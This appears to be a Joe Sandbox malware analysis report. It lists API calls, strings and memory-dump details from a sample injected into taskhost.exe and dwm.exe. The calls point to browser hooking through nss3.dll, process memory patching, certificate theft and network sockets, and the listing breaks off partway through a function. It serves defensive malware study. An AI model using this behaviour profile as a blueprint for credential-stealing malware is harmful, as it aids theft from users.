SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 011AB28C

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 011AB2E0

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 011AB343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 011AB36F

Part of subcall function 011AB3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011AB437
Part of subcall function 011AB3EC: WriteFile.KERNEL32(011AB3D4,?,00000146,?,00000000), ref: 011AB475
Part of subcall function 011AB3EC: WriteFile.KERNEL32(011AB3D4,?,00000000,?,00000000), ref: 011AB499
Part of subcall function 011AB3EC: FlushFileBuffers.KERNEL32(011AB3D4), ref: 011AB4AD
Part of subcall function 011AB3EC: CloseHandle.KERNEL32(011AB3D4), ref: 011AB4B6

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 01195B40

Part of subcall function 011A4DCA: CloseHandle.KERNEL32(00000000), ref: 011A4DD9
Part of subcall function 011A4DCA: CloseHandle.KERNEL32(00000000), ref: 011A4DE2

Part of subcall function 011A2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 011A28A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 01195B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 01195BD6
TerminateProcess.KERNEL32(?,00000000), ref: 01195BE3

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A6B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 011A6B4A
DispatchMessageW.USER32(?), ref: 011A6B55
PeekMessageW.USER32(00000000), ref: 011A6B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 011A6B79

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 011A4A3D
Thread32First.KERNEL32(00000000,?), ref: 011A4A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 011A4A6E
CloseHandle.KERNEL32(00000000), ref: 011A4A79

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 011A6973: getsockname.WS2_32(?,?,?), ref: 011A6991

Part of subcall function 011A636E: recv.WS2_32(?,?,00000004,00000000), ref: 011A6392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 011A04DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 011A0515

Part of subcall function 011A64FD: socket.WS2_32(00000000,00000001,00000006), ref: 011A6506
Part of subcall function 011A64FD: bind.WS2_32(00000000,?,-0000001D), ref: 011A6526
Part of subcall function 011A64FD: listen.WS2_32(00000000,?), ref: 011A6535
Part of subcall function 011A64FD: #3.WS2_32(00000000), ref: 011A6540

Part of subcall function 011A672E: accept.WS2_32(00000000,00000000,00000001), ref: 011A6754

Part of subcall function 011A6403: socket.WS2_32(?,00000001,00000006), ref: 011A640C
Part of subcall function 011A6403: connect.WS2_32(00000000,?,-0000001D), ref: 011A642C
Part of subcall function 011A6403: #3.WS2_32(00000000,?,?,?,01197518,?), ref: 011A6437

Part of subcall function 011A67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 011A67CC

Part of subcall function 011A65B7: recv.WS2_32(?,?,00000400,00000000), ref: 011A6600
Part of subcall function 011A65B7: #19.WS2_32(?,?,00000000,00000000), ref: 011A661A
Part of subcall function 011A65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 011A6657

Part of subcall function 011A675E: shutdown.WS2_32(?,00000002), ref: 011A6766
Part of subcall function 011A675E: #3.WS2_32(?), ref: 011A676D

Part of subcall function 011A0397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 011A03BB
Part of subcall function 011A0397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 011A03CA

Strings

Z, xrefs: 011A064F

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 011A46F4: GetTickCount.KERNEL32(011A8766,?), ref: 011A46F4

CharUpperW.USER32(00000000), ref: 011A785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 011A7759
.exe, xrefs: 011A7745

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AD64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 011AD664

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

GetSystemTime.KERNEL32(?), ref: 011AD6B0

Part of subcall function 011AD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,011AD581,?,?,00000000), ref: 011AD43F

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Strings

.txt, xrefs: 011AD746

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7A14, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 011A7AB5

Strings

Local\, xrefs: 011A7A9A
Global\, xrefs: 011A7A91

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 0119A5C9

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

&, xrefs: 0119A59F
#, xrefs: 0119A5AD

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01199C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 01199CA8

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

&, xrefs: 01199C7E
#, xrefs: 01199C8C

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A2B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 011A2B1F
GetProcAddress.KERNEL32(00000000,?), ref: 011A2B41

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

0x01D9C0A0, xrefs: 011A2B63

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A8737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 011A874E

Part of subcall function 011A46F4: GetTickCount.KERNEL32(011A8766,?), ref: 011A46F4

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

Part of subcall function 011A856B: CreateFileW.KERNEL32(011A4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011A8585
Part of subcall function 011A856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011A85A8
Part of subcall function 011A856B: CloseHandle.KERNEL32(00000000), ref: 011A85B5

Strings

tmp, xrefs: 011A8767
%s%08x.%s, xrefs: 011A876C

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A6F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 011A6FB1

Part of subcall function 011A8716: SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
Part of subcall function 011A8716: DeleteFileW.KERNELBASE(?), ref: 011A8729

PathFindFileNameW.SHLWAPI(?), ref: 011A6FD3

Part of subcall function 011A353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,011A4232,00000000,00000000,00000000,011A3597,00000000,00000000,00000000,?,00000000), ref: 011A3555

Strings

cab, xrefs: 011A6FA6

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AC8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 011A6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08), ref: 011A6AC3
Part of subcall function 011A6AAA: GetLastError.KERNEL32(?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08,?,?,00000000), ref: 011A6AC9
Part of subcall function 011A6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08), ref: 011A6AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,011AC9FB,00000000,?,?,?), ref: 011AC8C6

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A4CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 011A4CEE
Part of subcall function 011A4CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 011A4D0D
Part of subcall function 011A4CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 011A4D19
Part of subcall function 011A4CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,011AC8F5,00000000,00000000,00000000,011AC8F5,011AC8F5,00000000,?,?,?,00000000,00000044), ref: 011A4D8A
Part of subcall function 011A4CDD: CloseHandle.KERNEL32(?), ref: 011A4D9D
Part of subcall function 011A4CDD: CloseHandle.KERNEL32(?), ref: 011A4DA2
Part of subcall function 011A4CDD: FreeLibrary.KERNEL32(?), ref: 011A4DB9

CloseHandle.KERNEL32(?), ref: 011AC907

Strings

"%s", xrefs: 011AC8DA

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A5484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 011A5403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 011A5414
Part of subcall function 011A5403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 011A5427
Part of subcall function 011A5403: ObtainUserAgentString.URLMON(00000000,?,00000000,?), ref: 011A544C
Part of subcall function 011A5403: FreeLibrary.KERNEL32(?), ref: 011A5479

GetTickCount.KERNEL32(?), ref: 011A54C9

Part of subcall function 011A52D1: WaitForSingleObject.KERNEL32(?,?), ref: 011A5325
Part of subcall function 011A52D1: Sleep.KERNEL32(?,?,?,00000000), ref: 011A5338
Part of subcall function 011A52D1: InternetCloseHandle.WININET(00000000), ref: 011A53BE

GetTickCount.KERNEL32(00000000), ref: 011A54DB

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

http://www.google.com/webhp, xrefs: 011A54A9

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

Part of subcall function 011A85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 011A85F5
Part of subcall function 011A85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8608
Part of subcall function 011A85D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8630
Part of subcall function 011A85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 011A8648
Part of subcall function 011A85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8662
Part of subcall function 011A85D0: CloseHandle.KERNEL32(?), ref: 011A866B

StrStrIA.SHLWAPI(?,?), ref: 0119A410
StrStrIA.SHLWAPI(?,?), ref: 0119A422
StrStrIA.SHLWAPI(?,?), ref: 0119A432
StrStrIA.SHLWAPI(?,?), ref: 0119A444

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,011AC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 011A8689
Part of subcall function 011A8678: CloseHandle.KERNEL32(?), ref: 011A8697

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AAD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAD7C

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

LeaveCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAD9D
EnterCriticalSection.KERNEL32(011B3FB4,?,?,?,?,011AB052,?), ref: 011AADAE

Part of subcall function 011A3346: HeapAlloc.KERNEL32(00000008,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?,?), ref: 011A3368
Part of subcall function 011A3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?), ref: 011A3379

LeaveCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAE47

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Analysis Process: dwm.exe PID: 2020 Parent PID: 1292

Executed Functions

Function 006420C4, Relevance: 49.2, APIs: 17, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00642105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00642172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 006421A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 006421DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 006421FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0064220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0064221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00642230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00642242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00642254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0064228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0064229C
InitializeCriticalSection.KERNEL32(0065400C,?,?,00000000), ref: 006422C9
WSAStartup.WS2_32(00000202,?), ref: 006422DF
CreateEventW.KERNEL32(00652C30,00000001,00000000,00000000,?,?,00000000), ref: 00642300

Part of subcall function 006449D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00642326,000000FF,00652C08,?,?,00000000), ref: 006449E2
Part of subcall function 006449D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00642326,000000FF,00652C08), ref: 00644A0E
Part of subcall function 006449D2: CloseHandle.KERNEL32(?), ref: 00644A23

GetLengthSid.ADVAPI32(00000000,000000FF,00652C08,?,?,00000000), ref: 00642335

Part of subcall function 00641E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00641E4B
Part of subcall function 00641E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00641E5A
Part of subcall function 00641E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00641E6E

GetCurrentProcessId.KERNEL32(00000000,00D8F7D0,00000000,?,?,00000000), ref: 00642362

Part of subcall function 00641E8F: IsBadReadPtr.KERNEL32(?,?), ref: 00641EBD

Part of subcall function 00647A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00647AB5

Part of subcall function 00641F98: InitializeCriticalSection.KERNEL32(00653FB4,00000000,76C61857,00000000), ref: 00641FAF
Part of subcall function 00641F98: InitializeCriticalSection.KERNEL32(00652AC8), ref: 00641FE4
Part of subcall function 00641F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0064200C
Part of subcall function 00641F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00642029
Part of subcall function 00641F98: CloseHandle.KERNEL32(00000000), ref: 0064203A
Part of subcall function 00641F98: InitializeCriticalSection.KERNEL32(006523AC), ref: 00642081
Part of subcall function 00641F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00642093
Part of subcall function 00641F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 0064209E

Part of subcall function 00641EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00641F2C
Part of subcall function 00641EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 00641F56

Strings

GetProcAddress, xrefs: 0064211D
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 006423AB
NtCreateUserProcess, xrefs: 006421FC
LoadLibraryA, xrefs: 00642127
RtlUserThreadStart, xrefs: 00642220
NtCreateThread, xrefs: 006421F4
LdrGetDllHandle, xrefs: 00642244
NtQueryInformationProcess, xrefs: 0064220E
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 006423F3
LdrLoadDll, xrefs: 00642232
SOFTWARE\Microsoft\Xyuxy, xrefs: 006423F9

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00641F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(00653FB4,00000000,76C61857,00000000), ref: 00641FAF
InitializeCriticalSection.KERNEL32(00652AC8), ref: 00641FE4

Part of subcall function 00642828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 006428A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0064200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00642029
CloseHandle.KERNEL32(00000000), ref: 0064203A

Part of subcall function 00649D6D: InitializeCriticalSection.KERNEL32(00653F24,00000000,7718F8FF), ref: 00649D8F
Part of subcall function 00649D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00649E63

Part of subcall function 0064B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0064B4F0

InitializeCriticalSection.KERNEL32(006523AC), ref: 00642081

Part of subcall function 0063E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0063E108
Part of subcall function 0063E0FB: GetThreadDesktop.USER32(00000000), ref: 0063E10F
Part of subcall function 0063E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0063E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00642093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 0064209E

Part of subcall function 0063C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,006420A9), ref: 0063C111
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,006420A9), ref: 0063C125
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0063C132
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0063C13F
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0063C14C

Strings

nss3.dll, xrefs: 00642099
nspr4.dll, xrefs: 0064208E

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647BF7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108

APIs

Part of subcall function 00647BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,0063C168,DB84D88A,?,?,?,0063BD76,00000000,00000000,00000004,?,?,0063C160), ref: 00647BC7

VirtualProtectEx.KERNELBASE(000000FF,0063C160,0000001E,00000040,`#e,0063C158,00000004,?,?,?,?,0063BE97,6A006523,00000000), ref: 00647C24
ReadProcessMemory.KERNELBASE(000000FF,0063C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0063BE97,6A006523,00000000), ref: 00647C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00647CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 00647CED
VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#e,`#e,?,?,?,?,0063BE97,6A006523,00000000,?,?,0063C160,00652360), ref: 00647D05

Strings

`#e, xrefs: 00647C17, 00647CF7, 00647CFB, 00647C1A, 00647CFA

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 00644B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 00644B3F
GetLastError.KERNEL32(?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 00644B45

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 00644B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 00644B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 00644B8B

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

CloseHandle.KERNEL32(?), ref: 00644BB6

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 0063BBE0
SetThreadPriority.KERNEL32(00000000), ref: 0063BBE7

Part of subcall function 00642507: CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

Part of subcall function 00642828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 006428A1

PathQuoteSpacesW.SHLWAPI(?), ref: 0063BC2A

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

WaitForSingleObject.KERNEL32(000000C8), ref: 0063BC62

Part of subcall function 0064763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00649EAB,?,?,00000004), ref: 00647658
Part of subcall function 0064763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00649EAB,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647672
Part of subcall function 0064763A: RegCloseKey.ADVAPI32(00000004,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 0063BC98

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

